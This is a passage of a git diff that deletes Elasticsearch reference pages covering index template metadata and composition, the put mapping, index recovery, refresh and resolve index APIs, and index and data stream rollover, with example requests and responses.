can use the `_meta` parameter to add arbitrary metadata to an index template. -This user-defined object is stored in the cluster state, -so keeping it short is preferrable. - -The `_meta` parameter is optional and not automatically generated or used by {es}. - -To unset `_meta`, replace the template without specifying one. - -[source,console] --------------------------------------------------- -PUT /_index_template/template_1 -{ - "index_patterns": ["foo", "bar"], - "template": { - "settings" : { - "number_of_shards" : 3 - } - }, - "_meta": { - "description": "set number of shards to three", - "serialization": { - "class": "MyIndexTemplate", - "id": 17 - } - } -} --------------------------------------------------- - -To check the `_meta`, you can use the <> API. - -[[data-stream-definition]] -===== Data stream definition - -To use an index template for a data stream, the template must include an empty `data_stream` object. -Data stream templates are only used for a stream's backing indices, -they are not applied to regular indices. -See <>. - -[source,console] --------------------------------------------------- -PUT /_index_template/template_1 -{ - "index_patterns": ["logs-*"], - "data_stream": { } -} --------------------------------------------------- - -[[multiple-component-templates]] -===== Composing aliases, mappings, and settings - -When multiple component templates are specified in the `composed_of` field for an index template, -they are merged in the order specified, meaning that later component templates override earlier -component templates. Any mappings, settings, or aliases from the parent index template are merged -in next. Finally, any configuration on the index request itself is merged. 
- -In this example, the order of the two component templates changes the number of shards for an -index: - -[source,console] --------------------------------------------------- -PUT /_component_template/template_with_2_shards -{ - "template": { - "settings": { - "index.number_of_shards": 2 - } - } -} - -PUT /_component_template/template_with_3_shards -{ - "template": { - "settings": { - "index.number_of_shards": 3 - } - } -} - -PUT /_index_template/template_1 -{ - "index_patterns": ["t*"], - "composed_of": ["template_with_2_shards", "template_with_3_shards"] -} --------------------------------------------------- - -In this case, an index matching `t*` will have three primary shards. If the order of composed -templates were reversed, the index would have two primary shards. - -Mapping definitions are merged recursively, which means that later mapping components can -introduce new field mappings and update the mapping configuration. If a field mapping is -already contained in an earlier component, its definition will be completely overwritten -by the later one. - -This recursive merging strategy applies not only to field mappings, but also root options like -`dynamic_templates` and `meta`. If an earlier component contains a `dynamic_templates` block, -then by default new `dynamic_templates` entries are appended onto the end. If an entry already -exists with the same key, then it is overwritten by the new definition. diff --git a/docs/reference/indices/put-mapping.asciidoc b/docs/reference/indices/put-mapping.asciidoc deleted file mode 100644 index 002183ad7bd..00000000000 --- a/docs/reference/indices/put-mapping.asciidoc +++ /dev/null @@ -1,431 +0,0 @@ -[[indices-put-mapping]] -=== Put mapping API -++++ -Put mapping -++++ - -Adds new fields to an existing data stream or index. You can also use the -put mapping API to change the search settings of existing fields. - -For data streams, these changes are applied to all backing indices by default. - -[source,console] ----- -PUT /my-index-000001/_mapping -{ - "properties": { - "email": { - "type": "keyword" - } - } -} ----- -// TEST[setup:my_index] - -NOTE: Before 7.0.0, the 'mappings' definition used to include a type name. -Although specifying types in requests is now deprecated, a type can still be -provided if the request parameter `include_type_name` is set. For more details, -please see <>. - - -[[put-mapping-api-request]] -==== {api-request-title} - -`PUT //_mapping` - -`PUT /_mapping` - - -[[put-mapping-api-path-params]] -==== {api-path-parms-title} - -``:: -(Optional, string) -Comma-separated list of data streams, indices, and index aliases used to limit -the request. Wildcard expressions (`*`) are supported. -+ -To target all data streams and indices in a cluster, omit this parameter or use -`_all` or `*`. - - -[[put-mapping-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=allow-no-indices] -+ -Defaults to `false`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=expand-wildcards] -+ -Defaults to `open`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=include-type-name] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=index-ignore-unavailable] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=timeoutparms] - -`write_index_only`:: -(Optional, Boolean) -If `true`, -the mappings are applied only to the current write index for the target. -Defaults to `false`. 
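-
-For example, a request like the following (an illustrative sketch that assumes
-a data stream named `my-data-stream` already exists) applies a new field
-mapping only to the stream's current write index:
-
-[source,console]
-----
-PUT /my-data-stream/_mapping?write_index_only=true
-{
-  "properties": {
-    "message": {
-      "type": "text"
-    }
-  }
-}
-----
-// TEST[skip:sketch that assumes an existing data stream]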
- - -[[put-mapping-api-request-body]] -==== {api-request-body-title} - -`properties`:: -+ --- -(Required, <>) Mapping for a field. For new -fields, this mapping can include: - -* Field name -* <> -* <> - -For existing fields, see <>. --- - - -[[put-mapping-api-example]] -==== {api-examples-title} - -[[put-field-mapping-api-basic-ex]] -===== Example with single target - -The put mapping API requires an existing data stream or index. The following -<> API request creates the `publications` -index with no mapping. - -[source,console] ----- -PUT /publications ----- - -The following put mapping API request adds `title`, a new <> field, -to the `publications` index. - -[source,console] ----- -PUT /publications/_mapping -{ - "properties": { - "title": { "type": "text"} - } -} ----- -// TEST[continued] - -[[put-mapping-api-multi-ex]] -===== Multiple targets - -The PUT mapping API can be applied to multiple data streams or indices with a single request. -For example, you can update mappings for the `my-index-000001` and `my-index-000002` indices at the same time: - -[source,console] --------------------------------------------------- -# Create the two indices -PUT /my-index-000001 -PUT /my-index-000002 - -# Update both mappings -PUT /my-index-000001,my-index-000002/_mapping -{ - "properties": { - "user": { - "properties": { - "name": { - "type": "keyword" - } - } - } - } -} --------------------------------------------------- - - -[[add-new-field-to-object]] -===== Add new properties to an existing object field - -You can use the put mapping API to add new properties to an existing -<> field. To see how this works, try the following example. - -Use the <> API to create an index with the -`name` object field and an inner `first` text field. - -[source,console] ----- -PUT /my-index-000001 -{ - "mappings": { - "properties": { - "name": { - "properties": { - "first": { - "type": "text" - } - } - } - } - } -} ----- - -Use the put mapping API to add a new inner `last` text field to the `name` -field. - -[source,console] ----- -PUT /my-index-000001/_mapping -{ - "properties": { - "name": { - "properties": { - "last": { - "type": "text" - } - } - } - } -} ----- -// TEST[continued] - - -[[add-multi-fields-existing-field-ex]] -===== Add multi-fields to an existing field - -<> let you index the same field in different ways. -You can use the put mapping API to update the `fields` mapping parameter and -enable multi-fields for an existing field. - -To see how this works, try the following example. - -Use the <> API to create an index with the -`city` <> field. - -[source,console] ----- -PUT /my-index-000001 -{ - "mappings": { - "properties": { - "city": { - "type": "text" - } - } - } -} ----- - -While text fields work well for full-text search, <> fields are -not analyzed and may work better for sorting or aggregations. - -Use the put mapping API to enable a multi-field for the `city` field. This -request adds the `city.raw` keyword multi-field, which can be used for sorting. - -[source,console] ----- -PUT /my-index-000001/_mapping -{ - "properties": { - "city": { - "type": "text", - "fields": { - "raw": { - "type": "keyword" - } - } - } - } -} ----- -// TEST[continued] - - -[[change-existing-mapping-parms]] -===== Change supported mapping parameters for an existing field - -The documentation for each <> indicates -whether you can update it for an existing field using the put mapping API. For -example, you can use the put mapping API to update the -<> parameter. 
- -To see how this works, try the following example. - -Use the <> API to create an index containing -a `user_id` keyword field. The `user_id` field has an `ignore_above` parameter -value of `20`. - -[source,console] ----- -PUT /my-index-000001 -{ - "mappings": { - "properties": { - "user_id": { - "type": "keyword", - "ignore_above": 20 - } - } - } -} ----- - -Use the put mapping API to change the `ignore_above` parameter value to `100`. - -[source,console] ----- -PUT /my-index-000001/_mapping -{ - "properties": { - "user_id": { - "type": "keyword", - "ignore_above": 100 - } - } -} ----- -// TEST[continued] - - -[[updating-field-mappings]] -===== Change the mapping of an existing field - -// tag::change-field-mapping[] -Except for supported <>, -you can't change the mapping or field type of an existing field. -Changing an existing field could invalidate data that's already indexed. - -If you need to change the mapping of a field in a data stream's backing indices, -see <>. - -If you need to change the mapping of a field in other indices, -create a new index with the correct mapping -and <> your data into that index. -// end::change-field-mapping[] - -To see how you can change the mapping of an existing field in an index, -try the following example. - -Use the <> API -to create an index -with the `user_id` field -with the <> field type. - -[source,console] ----- -PUT /my-index-000001 -{ - "mappings" : { - "properties": { - "user_id": { - "type": "long" - } - } - } -} ----- - -Use the <> API -to index several documents -with `user_id` field values. - -[source,console] ----- -POST /my-index-000001/_doc?refresh=wait_for -{ - "user_id" : 12345 -} - -POST /my-index-000001/_doc?refresh=wait_for -{ - "user_id" : 12346 -} ----- -// TEST[continued] - -To change the `user_id` field -to the <> field type, -use the create index API -to create a new index with the correct mapping. - -[source,console] ----- -PUT /my-new-index-000001 -{ - "mappings" : { - "properties": { - "user_id": { - "type": "keyword" - } - } - } -} ----- -// TEST[continued] - -Use the <> API -to copy documents from the old index -to the new one. - -[source,console] ----- -POST /_reindex -{ - "source": { - "index": "my-index-000001" - }, - "dest": { - "index": "my-new-index-000001" - } -} ----- -// TEST[continued] - - -[[rename-existing-field]] -===== Rename a field - -// tag::rename-field[] -Renaming a field would invalidate data already indexed under the old field name. -Instead, add an <> field to create an alternate field name. -// end::rename-field[] - -For example, -use the <> API -to create an index -with the `user_identifier` field. - -[source,console] ----- -PUT /my-index-000001 -{ - "mappings": { - "properties": { - "user_identifier": { - "type": "keyword" - } - } - } -} ----- - -Use the put mapping API to add the `user_id` field alias -for the existing `user_identifier` field. - -[source,console] ----- -PUT /my-index-000001/_mapping -{ - "properties": { - "user_id": { - "type": "alias", - "path": "user_identifier" - } - } -} ----- -// TEST[continued] diff --git a/docs/reference/indices/recovery.asciidoc b/docs/reference/indices/recovery.asciidoc deleted file mode 100644 index d33ff98d640..00000000000 --- a/docs/reference/indices/recovery.asciidoc +++ /dev/null @@ -1,451 +0,0 @@ -[[indices-recovery]] -=== Index recovery API -++++ -Index recovery -++++ - - -Returns information about ongoing and completed shard recoveries for one or more -indices. For data streams, the API returns information for the stream's backing -indices. 
- -[source,console] ----- -GET /my-index-000001/_recovery ----- -// TEST[setup:my_index] - - -[[index-recovery-api-request]] -==== {api-request-title} - -`GET //_recovery` - -`GET /_recovery` - - -[[index-recovery-api-desc]] -==== {api-description-title} - -Use the index recovery API -to get information about ongoing and completed shard recoveries. - -// tag::shard-recovery-desc[] -Shard recovery is the process -of syncing a replica shard from a primary shard. -Upon completion, -the replica shard is available for search. - -include::{es-repo-dir}/glossary.asciidoc[tag=recovery-triggers] - -// end::shard-recovery-desc[] - -[[index-recovery-api-path-params]] -==== {api-path-parms-title} - -``:: -(Optional, string) -Comma-separated list of data streams, indices, and index aliases used to limit -the request. Wildcard expressions (`*`) are supported. -+ -To target all data streams and indices in a cluster, omit this parameter or use -`_all` or `*`. - - -[[index-recovery-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=active-only] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=detailed] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=index-query-parm] - - -[[index-recovery-api-response-body]] -==== {api-response-body-title} - -`id`:: -(Integer) -ID of the shard. - -`type`:: -+ --- -(String) -Recovery type. -Returned values include: - -`STORE`:: -The recovery is related to -a node startup or failure. -This type of recovery is called a local store recovery. - -`SNAPSHOT`:: -The recovery is related to -a <>. - -`REPLICA`:: -The recovery is related to -a <>. - -`RELOCATING`:: -The recovery is related to -the relocation of a shard -to a different node in the same cluster. --- - -`STAGE`:: -+ --- -(String) -Recovery stage. -Returned values include: - -`DONE`:: -Complete. - -`FINALIZE`:: -Cleanup. - -`INDEX`:: -Reading index metadata and copying bytes from source to destination. - -`INIT`:: -Recovery has not started. - -`START`:: -Starting the recovery process; opening the index for use. - -`TRANSLOG`:: -Replaying transaction log . --- - -`primary`:: -(Boolean) -If `true`, -the shard is a primary shard. - -`start_time`:: -(String) -Timestamp of recovery start. - -`stop_time`:: -(String) -Timestamp of recovery finish. - -`total_time_in_millis`:: -(String) -Total time to recover shard in milliseconds. - -`source`:: -+ --- -(Object) -Recovery source. -This can include: - - * A repository description if recovery is from a snapshot - * A description of source node --- - -`target`:: -(Object) -Destination node. - -`index`:: -(Object) -Statistics about physical index recovery. - -`translog`:: -(Object) -Statistics about translog recovery. - -`start`:: -(Object) -Statistics about time to open and start the index. - - -[[index-recovery-api-example]] -==== {api-examples-title} - - -[[index-recovery-api-multi-ex]] -===== Get recovery information for several data streams and indices - -[source,console] --------------------------------------------------- -GET index1,index2/_recovery?human --------------------------------------------------- -// TEST[s/^/PUT index1\nPUT index2\n/] - - -[[index-recovery-api-all-ex]] -===== Get segment information for all data streams and indices in a cluster - -////////////////////////// -Here we create a repository and snapshot index1 in -order to restore it right after and prints out the -index recovery result. 
- -[source,console] --------------------------------------------------- -# create the index -PUT index1 -{"settings": {"index.number_of_shards": 1}} - -# create the repository -PUT /_snapshot/my_repository -{"type": "fs","settings": {"location": "recovery_asciidoc" }} - -# snapshot the index -PUT /_snapshot/my_repository/snap_1?wait_for_completion=true -{"indices": "index1"} - -# delete the index -DELETE index1 - -# and restore the snapshot -POST /_snapshot/my_repository/snap_1/_restore?wait_for_completion=true - --------------------------------------------------- - -[source,console-result] --------------------------------------------------- -{ - "snapshot": { - "snapshot": "snap_1", - "indices": [ - "index1" - ], - "shards": { - "total": 1, - "failed": 0, - "successful": 1 - } - } -} --------------------------------------------------- -////////////////////////// - -[source,console] --------------------------------------------------- -GET /_recovery?human --------------------------------------------------- -// TEST[continued] - -The API returns the following response: - -[source,console-result] --------------------------------------------------- -{ - "index1" : { - "shards" : [ { - "id" : 0, - "type" : "SNAPSHOT", - "stage" : "INDEX", - "primary" : true, - "start_time" : "2014-02-24T12:15:59.716", - "start_time_in_millis": 1393244159716, - "stop_time" : "0s", - "stop_time_in_millis" : 0, - "total_time" : "2.9m", - "total_time_in_millis" : 175576, - "source" : { - "repository" : "my_repository", - "snapshot" : "my_snapshot", - "index" : "index1", - "version" : "{version}", - "restoreUUID": "PDh1ZAOaRbiGIVtCvZOMww" - }, - "target" : { - "id" : "ryqJ5lO5S4-lSFbGntkEkg", - "host" : "my.fqdn", - "transport_address" : "my.fqdn", - "ip" : "10.0.1.7", - "name" : "my_es_node" - }, - "index" : { - "size" : { - "total" : "75.4mb", - "total_in_bytes" : 79063092, - "reused" : "0b", - "reused_in_bytes" : 0, - "recovered" : "65.7mb", - "recovered_in_bytes" : 68891939, - "percent" : "87.1%" - }, - "files" : { - "total" : 73, - "reused" : 0, - "recovered" : 69, - "percent" : "94.5%" - }, - "total_time" : "0s", - "total_time_in_millis" : 0, - "source_throttle_time" : "0s", - "source_throttle_time_in_millis" : 0, - "target_throttle_time" : "0s", - "target_throttle_time_in_millis" : 0 - }, - "translog" : { - "recovered" : 0, - "total" : 0, - "percent" : "100.0%", - "total_on_start" : 0, - "total_time" : "0s", - "total_time_in_millis" : 0, - }, - "verify_index" : { - "check_index_time" : "0s", - "check_index_time_in_millis" : 0, - "total_time" : "0s", - "total_time_in_millis" : 0 - } - } ] - } -} --------------------------------------------------- -// TESTRESPONSE[s/: (\-)?[0-9]+/: $body.$_path/] -// TESTRESPONSE[s/: "[^"]*"/: $body.$_path/] -//// -The TESTRESPONSE above replace all the fields values by the expected ones in the test, -because we don't really care about the field values but we want to check the fields names. -//// - -This response includes information -about a single index recovering a single shard. -The source of the recovery is a snapshot repository -and the target of the recovery is the `my_es_node` node. - -The response also includes the number -and percentage of files and bytes recovered. - - -[[index-recovery-api-detailed-ex]] -===== Get detailed recovery information - -To get a list of physical files in recovery, -set the `detailed` query parameter to `true`. 
- -[source,console] --------------------------------------------------- -GET _recovery?human&detailed=true --------------------------------------------------- -// TEST[s/^/PUT index1\n{"settings": {"index.number_of_shards": 1}}\n/] - -The API returns the following response: - -[source,console-result] --------------------------------------------------- -{ - "index1" : { - "shards" : [ { - "id" : 0, - "type" : "STORE", - "stage" : "DONE", - "primary" : true, - "start_time" : "2014-02-24T12:38:06.349", - "start_time_in_millis" : "1393245486349", - "stop_time" : "2014-02-24T12:38:08.464", - "stop_time_in_millis" : "1393245488464", - "total_time" : "2.1s", - "total_time_in_millis" : 2115, - "source" : { - "id" : "RGMdRc-yQWWKIBM4DGvwqQ", - "host" : "my.fqdn", - "transport_address" : "my.fqdn", - "ip" : "10.0.1.7", - "name" : "my_es_node" - }, - "target" : { - "id" : "RGMdRc-yQWWKIBM4DGvwqQ", - "host" : "my.fqdn", - "transport_address" : "my.fqdn", - "ip" : "10.0.1.7", - "name" : "my_es_node" - }, - "index" : { - "size" : { - "total" : "24.7mb", - "total_in_bytes" : 26001617, - "reused" : "24.7mb", - "reused_in_bytes" : 26001617, - "recovered" : "0b", - "recovered_in_bytes" : 0, - "percent" : "100.0%" - }, - "files" : { - "total" : 26, - "reused" : 26, - "recovered" : 0, - "percent" : "100.0%", - "details" : [ { - "name" : "segments.gen", - "length" : 20, - "recovered" : 20 - }, { - "name" : "_0.cfs", - "length" : 135306, - "recovered" : 135306 - }, { - "name" : "segments_2", - "length" : 251, - "recovered" : 251 - } - ] - }, - "total_time" : "2ms", - "total_time_in_millis" : 2, - "source_throttle_time" : "0s", - "source_throttle_time_in_millis" : 0, - "target_throttle_time" : "0s", - "target_throttle_time_in_millis" : 0 - }, - "translog" : { - "recovered" : 71, - "total" : 0, - "percent" : "100.0%", - "total_on_start" : 0, - "total_time" : "2.0s", - "total_time_in_millis" : 2025 - }, - "verify_index" : { - "check_index_time" : 0, - "check_index_time_in_millis" : 0, - "total_time" : "88ms", - "total_time_in_millis" : 88 - } - } ] - } -} --------------------------------------------------- -// TESTRESPONSE[s/"source" : \{[^}]*\}/"source" : $body.$_path/] -// TESTRESPONSE[s/"details" : \[[^\]]*\]/"details" : $body.$_path/] -// TESTRESPONSE[s/: (\-)?[0-9]+/: $body.$_path/] -// TESTRESPONSE[s/: "[^"]*"/: $body.$_path/] -//// -The TESTRESPONSE above replace all the fields values by the expected ones in the test, -because we don't really care about the field values but we want to check the fields names. -It also removes the "details" part which is important in this doc but really hard to test. -//// - -The response includes a listing -of any physical files recovered -and their sizes. - -The response also includes timings in milliseconds -of the various stages of recovery: - -* Index retrieval -* Translog replay -* Index start time - -This response indicates the recovery is `done`. -All recoveries, -whether ongoing or complete, -are kept in the cluster state -and may be reported on at any time. - -To only return information about ongoing recoveries, -set the `active_only` query parameter to `true`. diff --git a/docs/reference/indices/refresh.asciidoc b/docs/reference/indices/refresh.asciidoc deleted file mode 100644 index 98fbd5268ae..00000000000 --- a/docs/reference/indices/refresh.asciidoc +++ /dev/null @@ -1,110 +0,0 @@ -[[indices-refresh]] -=== Refresh API -++++ -Refresh -++++ - -Refreshes one or more indices. For data streams, the API refreshes the stream's -backing indices. 
- -[source,console] ----- -POST /my-index-000001/_refresh ----- -// TEST[setup:my_index] - - -[[refresh-api-request]] -==== {api-request-title} - -`POST /_refresh` - -`GET /_refresh` - -`POST /_refresh` - -`GET /_refresh` - - -[[refresh-api-desc]] -==== {api-description-title} - -Use the refresh API to explicitly refresh one or more indices. -If the request targets a data stream, it refreshes the stream's backing indices. -A _refresh_ makes all operations performed on an index -since the last refresh -available for search. - -// tag::refresh-interval-default[] -By default, Elasticsearch periodically refreshes indices every second, but only on -indices that have received one search request or more in the last 30 seconds. -// end::refresh-interval-default[] -You can change this default interval -using the <> setting. - -Refresh requests are synchronous and do not return a response until the -refresh operation completes. - -[IMPORTANT] -==== -Refreshes are resource-intensive. -To ensure good cluster performance, -we recommend waiting for {es}'s periodic refresh -rather than performing an explicit refresh -when possible. - -If your application workflow -indexes documents and then runs a search -to retrieve the indexed document, -we recommend using the <>'s -`refresh=wait_for` query parameter option. -This option ensures the indexing operation waits -for a periodic refresh -before running the search. -==== - -[[refresh-api-path-params]] -==== {api-path-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=index] -+ -To refresh all indices in the cluster, -omit this parameter -or use a value of `_all` or `*`. - - -[[refresh-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=allow-no-indices] -+ -Defaults to `true`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=expand-wildcards] -+ -Defaults to `open`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=index-ignore-unavailable] - - -[[refresh-api-example]] -==== {api-examples-title} - - -[[refresh-api-multiple-ex]] -===== Refresh several data streams and indices - -[source,console] ----- -POST /my-index-000001,my-index-000002/_refresh ----- -// TEST[s/^/PUT my-index-000001\nPUT my-index-000002\n/] - - -[[refresh-api-all-ex]] -===== Refresh all data streams and indices in a cluster - -[source,console] ----- -POST /_refresh ----- diff --git a/docs/reference/indices/resolve.asciidoc b/docs/reference/indices/resolve.asciidoc deleted file mode 100644 index 3f0a5978f11..00000000000 --- a/docs/reference/indices/resolve.asciidoc +++ /dev/null @@ -1,141 +0,0 @@ -[[indices-resolve-index-api]] -=== Resolve index API -++++ -Resolve index -++++ - -Resolves the specified name(s) and/or index patterns for indices, index -aliases, and data streams. Multiple patterns and remote clusters are -supported. 
- -//// -[source,console] ----- -PUT /foo_closed - -POST /foo_closed/_close - -PUT /remotecluster-bar-01 - -PUT /freeze-index - -POST /freeze-index/_freeze - -PUT /my-index-000001 - -PUT /freeze-index/_alias/f-alias - -PUT /my-index-000001/_alias/f-alias - -PUT /_index_template/foo_data_stream -{ - "index_patterns": [ "foo" ], - "data_stream": { } -} - -PUT /_data_stream/foo ----- -// TESTSETUP - -[source,console] ----- -DELETE /_data_stream/* - -DELETE /_index_template/foo_data_stream ----- -// TEARDOWN -//// - -[source,console] ----- -GET /_resolve/index/my-index-* ----- - -[[resolve-index-api-request]] -==== {api-request-title} - -`GET /_resolve/index/` - - -[[resolve-index-api-path-params]] -==== {api-path-parms-title} - -``:: -+ --- -(Required, string) Comma-separated name(s) or index pattern(s) of the -indices, index aliases, and data streams to resolve. Resources on -<> can be specified using the -`:` syntax. --- - -[[resolve-index-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=expand-wildcards] -+ -Defaults to `open`. - -[[resolve-index-api-example]] -==== {api-examples-title} - -[source,console] ----- -GET /_resolve/index/f*,remoteCluster1:bar*?expand_wildcards=all ----- -// TEST[continued] -// TEST[s/remoteCluster1:/remotecluster-/] - -The API returns the following response: - -[source,console-result] ----- -{ - "indices": [ <1> - { - "name": "foo_closed", - "attributes": [ - "closed" - ] - }, - { - "name": "freeze-index", - "aliases": [ - "f-alias" - ], - "attributes": [ - "frozen", - "open" - ] - }, - { - "name": "remoteCluster1:bar-01", - "attributes": [ - "open" - ] - } - ], - "aliases": [ <2> - { - "name": "f-alias", - "indices": [ - "freeze-index", - "my-index-000001" - ] - } - ], - "data_streams": [ <3> - { - "name": "foo", - "backing_indices": [ - ".ds-foo-000001" - ], - "timestamp_field": "@timestamp" - } - ] -} ----- -// TESTRESPONSE[s/remoteCluster1:/remotecluster-/] -<1> All indices matching the supplied names or expressions -<2> All aliases matching the supplied names or expressions -<3> All data streams matching the supplied names or expressions diff --git a/docs/reference/indices/rollover-index.asciidoc b/docs/reference/indices/rollover-index.asciidoc deleted file mode 100644 index 55270a4f237..00000000000 --- a/docs/reference/indices/rollover-index.asciidoc +++ /dev/null @@ -1,549 +0,0 @@ -[[indices-rollover-index]] -=== Rollover index API -++++ -Rollover index -++++ - -Creates a new index for a rollover target when the target's existing index meets -a condition you provide. A rollover target can be either an -<> or a -<>. When targeting an alias, the alias -is updated to point to the new index. When targeting a data stream, the new -index becomes the data stream's write index and its generation is incremented. - -[source,console] ----- -POST /alias1/_rollover/my-index-000002 -{ - "conditions": { - "max_age": "7d", - "max_docs": 1000, - "max_size": "5gb" - } -} ----- -// TEST[s/^/PUT my_old_index_name\nPUT my_old_index_name\/_alias\/alias1\n/] - - -[[rollover-index-api-request]] -==== {api-request-title} - - -`POST //_rollover/` - -`POST //_rollover/` - - -[[rollover-index-api-desc]] -==== {api-description-title} - -The rollover index API rolls a rollover target to a new index when -the existing index meets a condition you provide. You can use this API to retire -an index that becomes too large or too old. - -NOTE: To roll over an index, a condition must be met *when you call the API*. 
-{es} does not monitor the index after you receive an API response. To
-automatically roll over indices when a condition is met, you can use {es}'s
-<>.
-
-The rollover index API accepts a rollover target name
-and a list of `conditions`.
-
-If the specified rollover target is an alias pointing to a single index,
-the rollover request:
-
-. Creates a new index
-. Adds the alias to the new index
-. Removes the alias from the original index
-
-If the specified rollover target is an alias pointing to multiple indices,
-one of these indices must have `is_write_index` set to `true`.
-In this case, the rollover request:
-
-. Creates a new index
-. Sets `is_write_index` to `true` for the new index
-. Sets `is_write_index` to `false` for the original index
-
-If the specified rollover target is a data stream, the rollover request:
-
-. Creates a new index
-. Adds the new index as a backing index and the write index on the data stream
-. Increments the `generation` attribute of the data stream
-
-[[rollover-wait-active-shards]]
-===== Wait for active shards
-
-Because the rollover operation creates a new index to roll over to, the
-<> setting on
-index creation applies to the rollover action.
-
-
-[[rollover-index-api-path-params]]
-==== {api-path-parms-title}
-
-``::
-(Required*, string)
-Name of the existing index alias or data stream on which to perform the rollover.
-
-
-``::
-+
---
-(Optional*, string)
-Name of the target index to create and assign the index alias.
-
-include::{es-repo-dir}/indices/create-index.asciidoc[tag=index-name-reqs]
-
-*This parameter is not permitted if `rollover-target` is a data stream. In
-that case, the new index name will be in the form `.ds--000001`
-where the zero-padded number of length 6 is the generation of the data stream.
-
-If `rollover-target` is an alias assigned to an index name that ends
-with `-` and a number, such as `logs-000001`, the name of the new
-index follows the same pattern and increments the number. For example,
-`logs-000001` increments to `logs-000002`. This number is zero-padded with a
-length of 6, regardless of the prior index name.
-
-If the existing index for the alias does not match this pattern, this parameter
-is required.
-
---
-
-
-[[rollover-index-api-query-params]]
-==== {api-query-parms-title}
-
-`dry_run`::
-(Optional, Boolean)
-If `true`,
-the request checks whether the index matches provided conditions
-but does not perform a rollover.
-Defaults to `false`.
-
-include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=include-type-name]
-
-include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=wait_for_active_shards]
-
-include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=timeoutparms]
-
-
-[[rollover-index-api-request-body]]
-==== {api-request-body-title}
-
-include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=aliases]
-
-`conditions`::
-+
---
-(Optional, object)
-If supplied, the set of conditions the rollover target's existing index must
-meet to roll over. If omitted, the rollover will be performed unconditionally.
-
-Parameters include:
-
-`max_age`::
-(Optional, <>)
-Maximum age of the index.
-
-`max_docs`::
-(Optional, integer)
-Maximum number of documents in the index.
-Documents added since the last refresh are not included in the document count.
-The document count does *not* include documents in replica shards.
-
-`max_size`::
-(Optional, <>)
-Maximum index size.
-This is the total size of all primary shards in the index.
-Replicas are not counted toward the maximum index size. - -TIP: To see the current index size, use the <> API. -The `pri.store.size` value shows the combined size of all primary shards. --- - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=mappings] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=settings] - - -[[rollover-index-api-example]] -==== {api-examples-title} - -[[rollover-index-basic-ex]] -===== Basic example - -[source,console] --------------------------------------------------- -PUT /logs-000001 <1> -{ - "aliases": { - "logs_write": {} - } -} - -# Add > 1000 documents to logs-000001 - -POST /logs_write/_rollover <2> -{ - "conditions": { - "max_age": "7d", - "max_docs": 1000, - "max_size": "5gb" - } -} --------------------------------------------------- -// TEST[setup:my_index_huge] -// TEST[s/# Add > 1000 documents to logs-000001/POST _reindex?refresh\n{"source":{"index":"my-index-000001"},"dest":{"index":"logs-000001"}}/] -<1> Creates an index called `logs-0000001` with the alias `logs_write`. -<2> If the index pointed to by `logs_write` was created 7 or more days ago, or - contains 1,000 or more documents, or has an index size at least around 5GB, then the `logs-000002` index is created - and the `logs_write` alias is updated to point to `logs-000002`. - -The API returns the following response: - -[source,console-result] --------------------------------------------------- -{ - "acknowledged": true, - "shards_acknowledged": true, - "old_index": "logs-000001", - "new_index": "logs-000002", - "rolled_over": true, <1> - "dry_run": false, <2> - "conditions": { <3> - "[max_age: 7d]": false, - "[max_docs: 1000]": true, - "[max_size: 5gb]": false, - } -} --------------------------------------------------- - -<1> Whether the index was rolled over. -<2> Whether the rollover was dry run. -<3> The result of each condition. - - -[[rollover-data-stream-ex]] -===== Roll over a data stream - -[source,console] ------------------------------------ -PUT _index_template/template -{ - "index_patterns": ["my-data-stream*"], - "data_stream": { } -} ------------------------------------ - -[source,console] --------------------------------------------------- -PUT /_data_stream/my-data-stream <1> - -# Add > 1000 documents to my-data-stream - -POST /my-data-stream/_rollover <2> -{ - "conditions" : { - "max_age": "7d", - "max_docs": 1000, - "max_size": "5gb" - } -} --------------------------------------------------- -// TEST[continued] -// TEST[setup:my_index_huge] -// TEST[s/# Add > 1000 documents to my-data-stream/POST _reindex?refresh\n{ "source": { "index": "my-index-000001" }, "dest": { "index": "my-data-stream", "op_type": "create" } }/] -<1> Creates a data stream called `my-data-stream` with one initial backing index -named `my-data-stream-000001`. -<2> This request creates a new backing index, `my-data-stream-000002`, and adds -it as the write index for `my-data-stream` if the current -write index meets at least one of the following conditions: -+ --- -* The index was created 7 or more days ago. -* The index has an index size of 5GB or greater. -* The index contains 1,000 or more documents. 
--- - -The API returns the following response: - -[source,console-result] --------------------------------------------------- -{ - "acknowledged": true, - "shards_acknowledged": true, - "old_index": ".ds-my-data-stream-000001", <1> - "new_index": ".ds-my-data-stream-000002", <2> - "rolled_over": true, <3> - "dry_run": false, <4> - "conditions": { <5> - "[max_age: 7d]": false, - "[max_docs: 1000]": true, - "[max_size: 5gb]": false, - } -} --------------------------------------------------- - -<1> The previous write index for the data stream. -<2> The new write index for the data stream. -<3> Whether the index was rolled over. -<4> Whether the rollover was dry run. -<5> The result of each condition. - -//// -[source,console] ------------------------------------ -DELETE /_data_stream/my-data-stream -DELETE /_index_template/template ------------------------------------ -// TEST[continued] -//// - -[[rollover-index-settings-ex]] -===== Specify settings for the target index - -The settings, mappings, and aliases for the new index are taken from any -matching <>. If the rollover target is an -index alias, you can specify `settings`, `mappings`, and `aliases` in the body -of the request just like the <> API. Values -specified in the request override any values set in matching index templates. -For example, the following `rollover` request overrides the -`index.number_of_shards` setting: - -[source,console] --------------------------------------------------- -PUT /logs-000001 